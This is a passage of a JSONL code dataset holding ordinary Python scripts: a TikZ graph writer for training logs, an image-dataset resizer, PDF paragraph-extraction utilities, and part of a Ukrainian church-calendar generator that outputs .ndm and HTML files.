f.write('\\t\\\\addplot[smooth,mark=*] plot coordinates {\\n')\n for prob_index, prob in probabilities:\n f.write('\\t\\t(%d,%f)\\n' % (prob_index, prob))\n f.write('\\t};\\n')\n for epoch_index in epoch_indeces:\n f.write('\\t\\\\draw[dashed] ({axis cs:%d,0}|-{rel axis cs:0,1}) -- ({axis cs:%d,0}|-{rel axis cs:0,0});\\n' % (epoch_index, epoch_index))\n f.write('\\t\\\\end{axis}\\n')\n f.write('\\\\end{tikzpicture}')\n\n\ndef main(argv):\n if len(argv) < 2 or len(argv) > 4:\n print(\"Usage: python3 loss_graph.py <path/to/training_sum.log> (<path/to/save_dir>) (<skip_every_x_probs>)\")\n sys.exit(1)\n training_log_path = argv[1]\n if len(argv) == 3:\n save_dir = argv[2]\n else:\n save_dir = './'\n if len(argv) == 4:\n skip_x_probs = int(argv[3])\n else:\n # default skip 10 probabilities before taking one\n skip_x_probs = 10\n if 'elevator' in training_log_path:\n skip_x_probs = 1\n\n log_file = open(training_log_path, 'r')\n log_lines = [l.strip() for l in log_file.readlines()]\n\n # first line ends with <domain>: -> split to get \"<domain:\" and drop last character\n domain_name = log_lines[0].split()[-1][:-1]\n tex_path = os.path.join(save_dir, 'action_probability_graph_' + domain_name + '.tex')\n probabilities, epoch_indeces = extract_probabilities(log_lines, skip_x_probs)\n write_probability_graph(probabilities, epoch_indeces[1:], tex_path)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"LukasSchaefer/ASNets_FastDownward","sub_path":"evaluation/evaluation_data_scripts/act_probability_graph.py","file_name":"act_probability_graph.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9161692586","text":"import sys; sys.path.extend(['.'])\nimport os\nimport re\nimport shutil\nimport argparse\n\nfrom tqdm import tqdm\nfrom PIL import Image\nfrom joblib import Parallel, 
delayed\n\nfrom scripts.utils import tqdm_joblib, resize_and_save_image, file_ext\n\n#----------------------------------------------------------------------------\n\ndef resize_dataset(\n source_dir, target_dir: str=None, size: int=None, format: str=None, num_jobs: int=8, ignore_regex: str=None,\n ignore_ext: str=None, images_only: bool=False, fname_prefix: str='', rename_enum: bool=False, **resizing_kwargs):\n\n assert not size is None\n\n Image.init() # to load the extensions\n target_dir = f'{source_dir}_{size}' if target_dir is None else target_dir\n file_names = {os.path.relpath(os.path.join(root, fname), start=source_dir) for root, _dirs, files in os.walk(source_dir) for fname in files}\n\n if not ignore_ext is None:\n file_names = {f for f in file_names if not f.endswith(ignore_ext)}\n\n if not ignore_regex is None:\n file_names = {f for f in file_names if not re.fullmatch(ignore_regex, f)}\n\n jobs = []\n dirs_to_create = set()\n\n for i, file_name in tqdm(enumerate(file_names), desc=f'Collecting jobs'):\n src_path = os.path.join(source_dir, file_name)\n src_ext = file_ext(src_path)\n\n if src_ext in Image.EXTENSION:\n trg_file_basename = f'{i:08d}' if rename_enum else (fname_prefix + file_name[:file_name.rfind('.')])\n trg_path = os.path.join(target_dir, trg_file_basename + (src_ext if format is None else format))\n jobs.append(delayed(resize_and_save_image)(\n src_path=src_path,\n trg_path=trg_path,\n size=size,\n **resizing_kwargs,\n ))\n elif not images_only:\n assert not os.path.islink(src_path)\n trg_path = os.path.join(target_dir, file_name)\n print(f'Copying {src_path} => {trg_path} since it is not an image')\n jobs.append(delayed(shutil.copyfile)(src=src_path, dst=trg_path))\n else:\n trg_path = None\n\n if not trg_path is None:\n dirs_to_create.add(os.path.dirname(trg_path))\n\n for d in tqdm(dirs_to_create, desc='Creating necessary directories'):\n if d != '':\n os.makedirs(d, exist_ok=True)\n\n with tqdm_joblib(tqdm(desc=\"Executing jobs\", total=len(jobs))) as progress_bar:\n Parallel(n_jobs=num_jobs)(jobs)\n\n#----------------------------------------------------------------------------\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--source_dir', required=True, type=str, help='Source directory')\n parser.add_argument('-t', '--target_dir', required=False, type=str, default=None, help='Target directory (default: `{source_dir}_{size}`)')\n parser.add_argument('-s', '--size', required=True, type=int, help='Target size.')\n parser.add_argument('-f', '--format', type=str, default=None, help='In which format should we save? 
If none, then use the source file format.')\n parser.add_argument('-j', '--num_jobs', type=int, default=8, help='Number of jobs for parallel execution')\n parser.add_argument('--ignore_ext', type=str, default='.DS_Store', help='File extension to ignore.')\n parser.add_argument('--fname_prefix', type=str, default='', help='Add this prefix to each file name.')\n parser.add_argument('--images_only', action='store_true', help='Process images only?')\n parser.add_argument('--rename_enum', action='store_true', help='Should we rename each file name with a numeric id?')\n parser.add_argument('--ignore_grayscale', action='store_true', help='Should we ignore grayscale images?')\n parser.add_argument('--ignore_broken', action='store_true', help='Should we ignore images which we failed to process?')\n parser.add_argument('--ignore_existing', action='store_true', help='Should we ignore images which have been already saved?')\n args = parser.parse_args()\n\n resize_dataset(\n source_dir=args.source_dir,\n target_dir=args.target_dir,\n size=args.size,\n format=args.format,\n num_jobs=args.num_jobs,\n ignore_ext=args.ignore_ext,\n fname_prefix=args.fname_prefix,\n images_only=args.images_only,\n rename_enum=args.rename_enum,\n ignore_grayscale=args.ignore_grayscale,\n ignore_broken=args.ignore_broken,\n ignore_existing=args.ignore_existing,\n )\n\n#----------------------------------------------------------------------------\n","repo_name":"snap-research/3dgp","sub_path":"scripts/data_scripts/resize_dataset.py","file_name":"resize_dataset.py","file_ext":"py","file_size_in_byte":4556,"program_lang":"python","lang":"en","doc_type":"code","stars":197,"dataset":"github-code","pt":"72"} +{"seq_id":"29484612995","text":"import os\nimport re\nfrom typing import Dict, List, Optional, Tuple\n\nimport pandas as pd\nimport spacy\nfrom PyPDF2 import PdfReader\nfrom spacy.tokens import Doc, Token\n\n\ndef process_tokens(\n doc: pd.Series, nlp: spacy.language.Language, stop_words: List[str]\n) -> List[str]:\n \"\"\"Processes the tokens in a document. Removes stop words, punctuation and non-alphabetic tokens.\"\"\"\n spacy_text = nlp(doc)\n return [\n token\n for token in spacy_text\n if not any([token.is_stop, token.is_punct, token.lemma_.lower() in stop_words, not token.is_alpha])\n ]\n\ndef get_filtered_tokens(spacy_text: Doc, stop_words: List[str]) -> List[Token]:\n \"\"\"Processes the tokens in a document. Removes stop words, punctuation and non-alphabetic tokens.\"\"\"\n return [\n token\n for token in spacy_text\n if not any([token.is_stop, token.is_punct, token.lemma_.lower() in stop_words, not token.is_alpha])\n ]\n\n\ndef process_lemmas(doc: pd.Series) -> List[str]:\n \"\"\"Makes tokens lemma lower case.\"\"\"\n return [token.lemma_.lower() for token in doc]\n\n\ndef _multiply_ngrams(tokens: List[str]):\n \"\"\"Generator that yields tokens, one time for standard token, three times for ngram. 
Used to multiply ngrams.\"\"\"\n for token in tokens:\n if \" \" in token:\n yield token\n yield token\n yield token\n\n\ndef get_table_of_contents(path: str, toc: str = \"Table of Contents\") -> Tuple[str, int]:\n \"\"\"Returns the table of contents of a pdf file and the page number of the table of contents.\"\"\"\n file = open(path, \"rb\")\n fileReader = PdfReader(file)\n text = \"\"\n toc_page = 0\n while not toc in text:\n try:\n pageObj = fileReader.pages[toc_page]\n # pageObj = fileReader.getPage(toc_page)\n except:\n return \"\", -1\n text = pageObj.extract_text()\n toc_page += 1\n file.close()\n return text, toc_page\n\n\ndef get_paragraphs_df(\n toc: str, pages_shift: int, paragraphs_names: Dict[str, List[str]], end_paragraph: str\n) -> pd.DataFrame:\n \"\"\"Based on the table of contents, returns a dataframe with the paragraphs and the pages they start and end on.\n\n Args:\n toc (str): table of contents of the pdf file.\n pages_shift (int): number of pages to shift the page numbers.\n paragraphs_names (Dict[str, List[str]]): dictionary with the paragraphs names.\n end_paragraph (str): name of the last paragraph.\n\n Returns:\n pd.DataFrame: dataframe with the paragraphs and the pages they start and end on.\n\n \"\"\"\n lines = toc.split(\"\\n\")\n rows = {\"paragraph\": [], \"start_page\": [], \"end_page\": [], \"start_text\": [], \"end_text\": []}\n for key, paragraphs in paragraphs_names.items():\n for paragraph in paragraphs:\n paragaph_without_spaces = paragraph.replace(\" \", \"\")\n paragraph_line = [line.replace(\" \", \"\") for line in lines if paragaph_without_spaces in line.replace(\" \", \"\")]\n if len(paragraph_line) == 0:\n continue\n paragraph_line = paragraph_line[0]\n paragraph_line_without_spaces = paragraph_line.replace(\" \", \"\")\n paragaph_without_spaces = paragraph.replace(\" \", \"\")\n try:\n start_page = (\n int(\n re.sub(\n \"[^0-9]+\",\n \"\",\n paragraph_line[paragraph_line.find(paragraph) + len(paragraph):],\n )\n )\n + pages_shift\n )\n except Exception as e:\n continue\n if len(rows[\"start_page\"]) > 0:\n rows[\"end_page\"].append(start_page)\n rows[\"end_text\"].append(paragraph if start_page!=999 else None)\n if key != end_paragraph:\n rows[\"paragraph\"].append(key)\n rows[\"start_page\"].append(start_page)\n rows[\"start_text\"].append(paragraph)\n else:\n break\n if len({len(i) for i in rows.values()}) != 1:\n rows[\"end_page\"].append(999)\n rows[\"end_text\"].append(None)\n return pd.DataFrame(rows)\n\n\ndef read_pages_from_pdf(path: str, start_page: int, end_page: int) -> str:\n \"\"\"Reads the text from a pdf file from start_page to end_page.\"\"\"\n file = open(path, \"rb\")\n fileReader = PdfReader(file)\n text = \"\"\n count = start_page - 1\n while count < end_page:\n try:\n pageObj = fileReader.pages[count]\n count += 1\n text += pageObj.extract_text().replace(\"\\n\", \"\")\n except IndexError:\n break\n return text\n\n\ndef read_paragraphs(\n df: pd.DataFrame,\n id_column: str,\n path: str,\n id: str,\n root: str = \"\"\n) -> pd.DataFrame:\n \"\"\"Reads paragraphs from a pdf file and saves them as txt files.\"\"\"\n result_dict = {\"paragraph\": [], id_column: [], \"text_path\": []}\n for i, row in df.iterrows():\n file_name = row.paragraph.replace(\":\",\"\").replace(\" \",\"_\").replace(\n \",\",\"\").replace(\"/\",\"_\").replace(\"(\",\"\").replace(\")\",\"\").replace(\n \"&\",\"\").replace(\"-\",\"_\").replace(\"__\",\"_\").lower()\n txt_destination = f\"{root}{id}_{file_name}.txt\"\n if row.start_page is None:\n text = 
\"\"\n else:\n start_page = row.start_page\n end_page = row.end_page\n for i in [0, -1, 1, 2]:\n start_page = row.start_page + i\n text = read_pages_from_pdf(path, start_page, end_page)\n if text != \"\":\n break\n if row.start_text is not None:\n try:\n text = row.start_text + text.split(row.start_text, 1)[1]\n except:\n pass\n if row.end_text is not None:\n text = text.split(row.end_text, 1)[0]\n text = text_cleaning(text)\n text_file = open(txt_destination, \"w+\", encoding=\"utf-8\")\n n = text_file.write(text)\n text_file.close()\n result_dict[\"paragraph\"].append(row.paragraph)\n result_dict[id_column].append(id)\n result_dict[\"text_path\"].append(txt_destination)\n return pd.DataFrame(result_dict)\n\n\ndef process_all_documents(\n directory_path: str,\n id_column: str,\n paragraphs_names: Dict[str, List[str]],\n save_txt: str,\n end_paragraph: str,\n toc_str: str = \"Table of Contents\",\n pages_shift: Optional[int] = None,\n) -> pd.DataFrame:\n \"\"\"Process documents from directory_path with\n table of contents with paragraph names and pages\n\n Args:\n directory_path (str): directory with documents to process\n id_column (str): name of the id column\n paragraphs_names (Dict[str, List[str]]): key - name of pargraph that should\n be displayed in the final df, value - list of possible names of this paragraph in toc\n save_txt (str): path to directory where txt files should be saved\n end_paragraph (str): last paragraph of the text that should not be present in final df\n toc_str (str, optional): name of table of contents in documents. Defaults to \"Table of Contents\".\n pages_shift (int, optional): difference between page number in table of contents and in pdf file.\n Defaults to None which will be interpreted as pages_shift = page of toc\n\n Returns:\n pd.DataFrame: data frame with desired format\n \"\"\"\n dir_list = os.listdir(directory_path)\n dir_list = [file for file in dir_list if file[-3:] == \"pdf\"]\n df = pd.DataFrame({\"paragraph\": [], id_column: [], \"text_path\": []})\n for doc in dir_list:\n toc, toc_page = get_table_of_contents(directory_path + doc, toc_str)\n paragraphs_df = get_paragraphs_df(\n toc, pages_shift or toc_page, paragraphs_names, end_paragraph\n )\n doc_df = read_paragraphs(paragraphs_df, id_column, directory_path + \"/\" + doc, doc[:-4], save_txt)\n df = pd.concat([df, doc_df], ignore_index=True)\n return df\n\n\ndef text_cleaning(text):\n # deleting URLs\n text = re.sub(r'\\w+:\\/{2}[\\d\\w-]+(\\.[\\d\\w-]+)*(?:(?:\\/[^\\s/]*))*', '', text, flags=re.MULTILINE)\n # deleting headlines\n text = re.sub(r'((\\d\\.)+\\d) +[A-Z]([a-z]|\\s|,)+', '', text)\n # deleting random numbers\n text = re.sub(r'((\\d)+ +)+\\(\\d+\\)', '', text)\n # deleting picture descriptions\n text = re.sub(r' \\d+ [A-Z](\\w|\\s|,)+.', '', text)\n # deleting tables\n sentences = text.split('. ')\n to_delete = False\n sentences_copy = sentences.copy()\n for i, sentence in enumerate(sentences):\n if to_delete:\n to_delete = False\n sentences_copy[i] = ''\n if re.match(r'\\s+Table \\d+', sentence):\n to_delete = True\n sentences_copy[i] = ''\n text = '. '.join(sentences_copy)\n # deleting multiple spaces\n text = re.sub(r'\\s{2,}', ' ', text)\n text = re.sub(r' . 
', '', text)\n return text\n","repo_name":"MI2DataLab/HADES","sub_path":"hades/data_loading/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9078,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"34743872348","text":"# coding=utf-8\nimport re,codecs,datetime,os, sys\nimport locale\nfrom datetime import date, timedelta\nimport calendar\nimport json\n\nlocale.setlocale(locale.LC_TIME, \"uk_UA\")\n\neaster_date_str = sys.argv[1] # YYYY-MM-DD\neaster_date = datetime.datetime(*[int(item) for item in easter_date_str.split('-')]).date()\n\nyear = easter_date.year\n\nfixed_dates = {} # is loaded from the file\n\nmonth_sizes = [31, 29 if calendar.isleap(year) else 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\nentry_types = {\"місяця\":-1,\"січня\":1,\"лютого\":2,\"березня\":3,\"квітня\":4,\"травня\":5,\"червня\":6,\"липня\":7,\"серпня\":8,\"вересня\":9,\"жовтня\":10,\"листопада\":11,\"грудня\":12}\n\nweek_days = {\"понеділок\":0,\"вівторок\":1,\"середа\":2,\"четвер\":3,\"пт\":4,\"субота\":5,\"неділя\":6}\n\nweek_days_short = {0 : \"П\", 1: \"В\",2:\"С\" ,3:\"Ч\" ,4:\"П\", 5:\"С\", 6:\"Н\"}\nmonth_names = [\"Січень\", \"Лютий\", \"Березень\", \"Квітень\", \"Травень\", \"Червень\", \"Липень\", \"Серпень\", \"Вересень\", \"Жовтень\", \"Листопад\", \"Грудень\"];\n\ntokens_to_months = {'{{january}}': 0, '{{february}}':1,'{{march}}':2,'{{april}}':3,'{{may}}':4,'{{june}}':5,'{{july}}':6,'{{august}}':7,'{{september}}':8,'{{october}}':9,'{{november}}':10,'{{december}}':11}\nlongFastingsToken = \"{{long-fastings}}\"\noneDayFastingsToken = \"{{one-day-fastings}}\"\nfastingFreeTimesToken = \"{{fasting-free-times}}\"\nforbiddenTimesToken = \"{{forbidden-times}}\"\n\ndays = []\nentry_by_date = {}\ndate_by_label = {}\nconditions = []\n\noneDayFastings = []\nlongFastings = []\nforbiddenTimes = []\nfastFreeTimes = []\n\nnestedEntryRegex = re.compile(\"\\{(.*)\\}\")\nfixedDateRegex = re.compile(\"^([0-9]{1,2}) (січня|лютого|березня|квітня|травня|червня|липня|серпня|вересня|жовтня|листопада|грудня)$\", re.U)\n#labelRegex = re.compile(\"^([абвгґдеєжзиіїйклмнопрстуфхцчшщьюяАБВГҐДЕЄЖЗИІЇЙКЛМНОПРСТУФХЦЧШЩЬЮЯ]+).*:$\", re.U)\nlabelRegex = re.compile(\"^(.+):$\")\nconditionRegex = re.compile(\"(.+),(.+):(.+)\")\ndef readLine(_file):\n\twhile True:\n\t\tline = _file.readline()\n\t\tif not line:\n\t\t\tbreak\n\t\tif (line.startswith(\"#\") or 3 > len(line)): # comment or empty string\n\t\t\tcontinue\n\t\telse:\n\t\t\tline = line.strip()\n\t\t\tbreak\n\n\treturn line\n\ndef readLineEvenIfEmpty(_file):\n\twhile True:\n\t\tline = _file.readline()\n\t\tif not line:\n\t\t\tbreak\n\t\tif line.startswith(\"#\"): # comment or empty string\n\t\t\tcontinue\n\t\telse:\n\t\t\tline = line.strip()\n\t\t\tbreak\n\n\treturn line\n\ndef readFile(fileName, entryType):\n\tfile = open(fileName,\"r\")\n\twhile 1:\n\t\tline1 = readLine(file)\n\n\t\tif not line1:\n\t\t\tbreak\n\n\t\tlabelMatcher = labelRegex.match(line1);\n\t\tlabel = None\n\t\n\t\tif (labelMatcher):\n\t\t\tlabel = labelMatcher.group(1)\n\t\t\tentryValue = readLine(file)\n\t\telse:\n\t\t\tentryValue = line1\n\t\n\t\tline2 = readLine(file)\n\t\t\n\t\tentry = buildEntryFromLine(line2)\n\t\tentry.value = entryValue\n\t\tentry.value_type = entryType\n\t\tif label:\n\t\t\tentry.label = label\n\t\tfor d in entry.dates:\n\t\t\tif d.year == year:\n\t\t\t\tentry_by_date[d].append(entry)\n\t\t\tif label:\n\t\t\t\tdate_by_label[label] = d\n\ndef readSaints():\n\tprint(\"Read 
saints\")\n\treadFile(\"new-style/saints.txt\", \"saint\")\n\ndef readCelebr():\n\tprint(\"Read celebr\")\n\treadFile(\"new-style/celebr.txt\", \"sundays\")\n\t\ndef readAdditional():\n\tprint(\"Read additional\")\n\treadFile(\"new-style/add.txt\", \"additional\")\n\ndef readConditions():\n\tfile = open(\"new-style/conditions\",\"r\")\n\twhile 1:\n\t\tline1 = readLine(file)\n\t\tif not line1:\n\t\t\tbreak\n\t\tmatcher = conditionRegex.match(line1)\n\t\tif ( None == matcher):\n\t\t\tprint(\"Failed to parse condition line: \" + line1)\n\t\t\tcontinue\n\t\tcondition = Condition()\n\t\tcondition.entry1 = matcher.group(1).strip()\n\t\tcondition.entry2 = matcher.group(2).strip()\n\t\tcondition.entryToLeave = matcher.group(3).strip()\n\t\tconditions.append(condition)\n\ndef readFastings():\n\tfile = open(\"new-style/fastings.txt\",\"r\")\n\twhile 1:\n\t\tline1 = readLine(file)\n\t\tif not line1:\n\t\t\tbreak\n\t\tdateRange = DateRange()\n\t\tdateRange.title = line1\n\t\tline2 = readLineEvenIfEmpty(file)\n\t\tif not line2:\n\t\t\tlongFastings.append(dateRange)\n\t\telse:\n\t\t\tstartDateEntry = buildEntryFromLine(line2)\n\t\t\tdateRange.startDate = startDateEntry.dates[0]\n\t\t\tline3 = readLineEvenIfEmpty(file)\n\t\t\tif not line3:\n\t\t\t\toneDayFastings.append(dateRange)\n\t\t\telse:\n\t\t\t\tendDateEntry = buildEntryFromLine(line3)\n\t\t\t\tdateRange.endDate = endDateEntry.dates[0]\n\t\t\t\tlongFastings.append(dateRange)\n\tfile.close()\n\ndef readForbiddenTimes():\n\tfile = open(\"new-style/forbidden-times.txt\",\"r\")\n\twhile 1:\n\t\tline1 = readLine(file)\n\t\tif not line1:\n\t\t\tbreak\n\t\tdateRange = DateRange()\n\t\tdateRange.title = line1\n\t\tforbiddenTimes.append(dateRange)\n\t\t\n\t\tline2 = readLineEvenIfEmpty(file)\n\t\tif line2:\n\t\t\tstartDateEntry = buildEntryFromLine(line2)\n\t\t\tdateRange.startDate = startDateEntry.dates[0]\n\t\t\tline3 = readLineEvenIfEmpty(file)\n\t\t\tif line3:\n\t\t\t\tendDateEntry = buildEntryFromLine(line3)\n\t\t\t\tdateRange.endDate = endDateEntry.dates[0]\n\tfile.close()\n\ndef readFastFreeTimes():\n\tfile = open(\"new-style/fast-free.txt\",\"r\")\n\twhile 1:\n\t\tline1 = readLine(file)\n\t\tline2 = readLine(file)\n\n\t\tif not line1:\n\t\t\tbreak\n\t\tdateRange = DateRange()\n\t\tfastFreeTimes.append(dateRange)\n\n\t\tdateRange.startDate = buildEntryFromLine(line1).dates[0]\n\t\tdateRange.endDate = buildEntryFromLine(line2).dates[0]\n\tfile.close()\n\ndef buildEntryFromLine(line):\n\tentry = Entry()\n\tentry.raw_value = line\n\tentry_tokens = line.split(\" \")\n\tfixedDateMatcher = fixedDateRegex.match(line)\n\tif ( None != fixedDateMatcher):\n\t\td = date(year, int(entry_types[fixedDateMatcher.group(2)]), int(fixedDateMatcher.group(1)))\n\t\tentry.dates.append(d)\n\telse:\n\t\tdistance = entry_tokens[0]\n\t\tweekday = entry_tokens[1]\n\n\t\tif (\"перед\" == entry_tokens[2]):\n\t\t\tdistance = \"-\" + distance\n\t\t\tstartpoint = ' '.join(entry_tokens[3:])\n\t\telif (\"після\" == entry_tokens[2]):\n\t\t\tdistance = \"+\" + distance\n\t\t\tstartpoint = ' '.join(entry_tokens[3:])\n\t\telse:\n\t\t\tassert entry_tokens[2] in entry_types\n\t\t\tstartpoint = entry_tokens[2]\n\t\tnestedEntryMatcher = nestedEntryRegex.match(startpoint)\n\t\tif None != nestedEntryMatcher:\n\t\t\tnestedEntryString = nestedEntryMatcher.group(1)\n\t\t\tstartpointEntry = buildEntryFromLine(nestedEntryString)\n\t\t\tfor startPointDate in startpointEntry.dates:\n\t\t\t\td = calculateDateFromFixedDate(startPointDate, weekday, distance)\n\t\t\t\tentry.dates.append(d)\n\t\telif 
startpoint in fixed_dates:\n\t\t\td = calculateDateFromFixedDate(fixed_dates[startpoint], weekday, distance)\n\t\t\tentry.dates.append(d)\n\t\telif entry_types[startpoint] == -1:\n\t\t\tmonths = range(1,13)\n\t\t\tfor month in months:\n\t\t\t\td = calculateDateByEntry(month, weekday, distance)\n\t\t\t\tentry.dates.append(d)\n\t\telse:\n\t\t\td = calculateDateByEntry(entry_types[startpoint], weekday, distance)\n\t\t\tentry.dates.append(d)\n\n\treturn entry\n\n\n\nclass Condition:\n\tdef isValid():\n\t\treturn True\nclass Entry:\n\tvalue = \"\" # string which we should append \n\tvalue_type = \"\" # red yellow\n\tdates = []\n\traw_value = \"\"\n\tlabel = \"\"\n\tdef __init__(self):\n\t\tself.dates = []\n\tdef __repr__(self):\n\t\treturn \"Entry[raw_value=\"+ self.raw_value +\", value=\"+self.value +\", value_type=\"+self.value_type +\", label=\" + self.label + \"]\" \n\ndef calculateDateFromFixedDate(startdate, weekday, distance):\n\tweekday = week_days[weekday]\n\tif distance.startswith(\"-\"):\n\t\treturn startdate+timedelta(days=(1+weekday + 6-startdate.weekday())%7, weeks=(int(distance)) )\n\telif distance.startswith(\"+\"):\n\t\treturn startdate+timedelta(days=-((7-weekday+ startdate.weekday())%7), weeks=(int(distance)) )\n\telse:\n\t\treturn None\n\t\t\n# month - 1..12 \n# weekday - string\n# number - first, last, 2nd, 3rd...\ndef calculateDateByEntry(month, weekday, number): \n\tweekday = week_days[weekday]\n\t\n\tif \"остання\" == number:\n\t\tdays = range(month_sizes[month-1], 0, -1)\n\t\tcount = 1\n\telif \"передостання\" == number:\n\t\tdays = range(month_sizes[month-1], 0, -1)\n\t\tcount = 2\n\telse:\n\t\tdays = range(1,month_sizes[month-1]+1)\n\t\tcount = int(number)\n\t\t\n\tfor day in days:\n\t\tday_date = date(year,month,day)\n\t\tif weekday == day_date.weekday():\n\t\t\tcount-=1\n\t\t\tif 0 == count:\n\t\t\t\treturn day_date\n\treturn None\n\nclass DateRange:\n\tstartDate = None\n\tendDate = None\n\ttitle = \"\"\n\tdef __repr__(self):\n\t\treturn title\n\n\nclass CalendarDate:\n\tdate = None\n\tsaint = \"\"\n\tcelebr = \"\"\n\tadditional = \"\"\n\tdef applyEntry(self, entry):\n\t\tif self.date in entry.dates:\n\t\t\tif \"sundays\" == entry.value_type:\n\t\t\t\tif self.celebr.endswith(\" \"):\n\t\t\t\t\tself.celebr = self.celebr + entry.value\n\t\t\t\telse:\n\t\t\t\t\tself.celebr = self.celebr +\" \"+ entry.value\n\t\t\t\tself.celebr = self.celebr.strip()\n\t\t\telif \"saint\" == entry.value_type:\n\t\t\t\tif self.saint.endswith(\" \"):\n\t\t\t\t\tself.saint = self.saint + entry.value\n\t\t\t\telse:\n\t\t\t\t\tself.saint = self.saint + \" \" + entry.value\n\t\t\t\tself.saint = self.saint.strip()\n\t\t\telif \"additional\" == entry.value_type:\n\t\t\t\tif self.additional.endswith(\" \"):\n\t\t\t\t\tself.additional = self.additional + entry.value\n\t\t\t\telse:\n\t\t\t\t\tself.additional = self.additional + \" \"+ entry.value\n\t\t\t\tself.additional = self.additional.strip()\n\ndef datetime_parser(dct):\n\tregex = re.compile(\"^([0-9]{2})/([0-9]{2})$\")\n\tfor k, v in dct.items():\n\t\tmatcher = regex.match(v) # date matcher\n\t\tif isinstance(v, str) and None != matcher:\n\t\t\ttry:\n\t\t\t\tdct[k] = date(year, int(matcher.group(1)), int(matcher.group(2)))\n\t\t\texcept:\n\t\t\t\tpass\n\treturn dct\n\ndef initCalendar():\n\tglobal fixed_dates\n\n\twith open(\"new-style/fixed_dates.json\") as file:\n\t\tfixed_dates = json.loads(file.read(), object_hook=datetime_parser)\n\tfixed_dates[\"Пасха\"] = easter_date\n\n\tmonths = range(12)\n\tfor month in months:\n\t\tm_days = 
range(month_sizes[month])\n\t\tfor day in m_days:\n\t\t\tcal_date = CalendarDate()\n\t\t\td = date(year, month+1, day +1)\n\t\t\tcal_date.date = d\n\t\t\tdays.append(cal_date)\n\t\t\tentry_by_date[d] = [] #{\"saint\" : [], \"sundays\": [], \"additional\": []}\n\n\tprint(year)\n\tprint(len(days))\n\n\n\ndef filterEntries():\n\tfor c in conditions:\n\t\tif c.entry2 == '*':\n\t\t\td = date_by_label[c.entry1]\n\t\t\tfor entry in list(entry_by_date[d]):\n\t\t\t\tif entry.label != c.entryToLeave:\n\t\t\t\t\tentry_by_date[d].remove(entry)\n\t\t\tcontinue\n\t\tif date_by_label[c.entry1] == date_by_label[c.entry2]:\n\t\t\td = date_by_label[c.entry1]\n\t\t\tfor entry in list(entry_by_date[d]):\n\t\t\t\tif entry.label in [c.entry1, c.entry2]:\n\t\t\t\t\tif entry.label != c.entryToLeave:\n\t\t\t\t\t\tentry_by_date[d].remove(entry)\n\ndef applyEntries():\n\tprint(\"Applying celebrations...\")\n\tfor day in days:\n\t\tfor entry in entry_by_date[day.date]:\n\t\t\tday.applyEntry(entry)\n\ndef cleanup():\n\tfor day in days:\n\t\tif (day.date == fixed_dates[\"Різдво\"]): # Christmas so removing everything else\n\t\t\tday.additional = \"\"\n\t\tif (\" (на неділю).\" in day.additional):\n\t\t\tif (day.date.weekday() == 6 ): # sunday\n\t\t\t\tday.additional = day.additional.replace(\" (на неділю).\", \".\")\n\t\tif day.date == fixed_dates[\"Пасха\"]:\n\t\t\tday.additional = \"\"\n\t\t\tday.saint = \"\"\n\ndef writeCalendar():\n\tdir = str(year)\n\tif not os.path.exists(dir):\n\t\tos.makedirs(dir)\n\t\n\ttotal_days_written = 0\n\tmonths = range(1,13)\n\n\tfor month in months:\n\t\tmonth_file = codecs.open(dir + \"/\" + str(month) + \".ndm\", \"w\", \"utf-8-sig\")\n\t\tmonth_file.write('\\n') #codecs.BOM_UTF8 + '\\n')\n\t\tmonth_days_written = 0\n\t\twhile month_days_written < month_sizes[month-1]:\n\t\t\tday = days[total_days_written + month_days_written]\n\t\t\tmonth_file.write(str(day.date.day) + \"\\n\")\n\t\t\tmonth_file.write(day.celebr + \"\\n\")\n\t\t\tmonth_file.write(day.saint + \"\\n\")\n\t\t\tmonth_file.write(day.additional + \"\\n\")\n\t\t\tmonth_file.write(\"0\" + \"\\n\")\n\t\t\tmonth_file.write(\"\\n\")\n\t\t\tmonth_days_written+=1\n\t\ttotal_days_written+=month_days_written\n\t\tmonth_file.close()\n\tprint (len(days))\n\tprint(\"Writing calendar to an output file. 
Done...\")\n\ndef dateNmonth(date):\n\treturn date.strftime(\"%-d %B\")\n\ndef writeHtml():\n\tmonths = range(0,12)\n\ttotal_days_written = 0\n\t\n\twith open('html/template.html', 'r') as template, open('html/'+ str(year) + \".html\", 'w') as out:\n\t\tfor line in template:\n\t\t\tif line.strip() in tokens_to_months:\n\t\t\t\tmonth = tokens_to_months[line.strip()]\n\t\t\t\tmonth_days_written = 0\n\t\t\t\tout.write(\"<table class=\\\"table table-borderless\\\"><tbody>\")\n\t\t\t\twhile month_days_written < month_sizes[month]:\n\t\t\t\t\tday = days[total_days_written + month_days_written]\n\t\t\t\t\t\n\t\t\t\t\tisCelebr = day.celebr != '' or day.date.weekday() == 6 # sunday\n\t\t\t\t\tisSaint = day.saint != ''\n\t\t\t\t\tout.write(\"<tr class=\\\"month-row \"+ (\"celebr\" if isCelebr else '')+\"\\\">\\n\")\n\t\t\t\t\tout.write(\"<td class=\\\"text-right\\\">\\n\")\n\t\t\t\t\tout.write( str(day.date.day) + \"</td>\\n\")\n\t\t\t\t\tout.write(\"<td>\" + week_days_short[day.date.weekday()] + \"</td>\\n<td>\")\n\t\t\t\t\tif day.celebr != '':\n\t\t\t\t\t\tout.write(\"<span class=\\\" celebr\\\">\" + day.celebr + \"</span>\\n\")\n\t\t\t\t\tif isSaint:\n\t\t\t\t\t\tout.write(\"<span class=\\\" saint\\\">\" + day.saint + \"</span>\\n\")\n\t\t\t\t\tout.write(\"<span class=\\\" additional\\\">\" + day.additional + \"</span></td>\\n\")\n\t\t\t\t\tout.write(\"</tr>\\n\")\n\t\t\t\t\t\n\t\t\t\t\tmonth_days_written+=1\n\t\t\t\ttotal_days_written+=month_days_written\n\t\t\t\tout.write(\"</tbody></table>\")\n\t\t\telif line.strip() == longFastingsToken:\n\t\t\t\tfor f in longFastings:\n\t\t\t\t\tout.write(f.title)\n\t\t\t\t\tif (f.startDate):\n\t\t\t\t\t\tout.write(\" з <span class=\\\"celebration\\\">\" + dateNmonth(f.startDate))\n\t\t\t\t\t\tif(f.endDate):\n\t\t\t\t\t\t\tout.write(\"</span> по <span 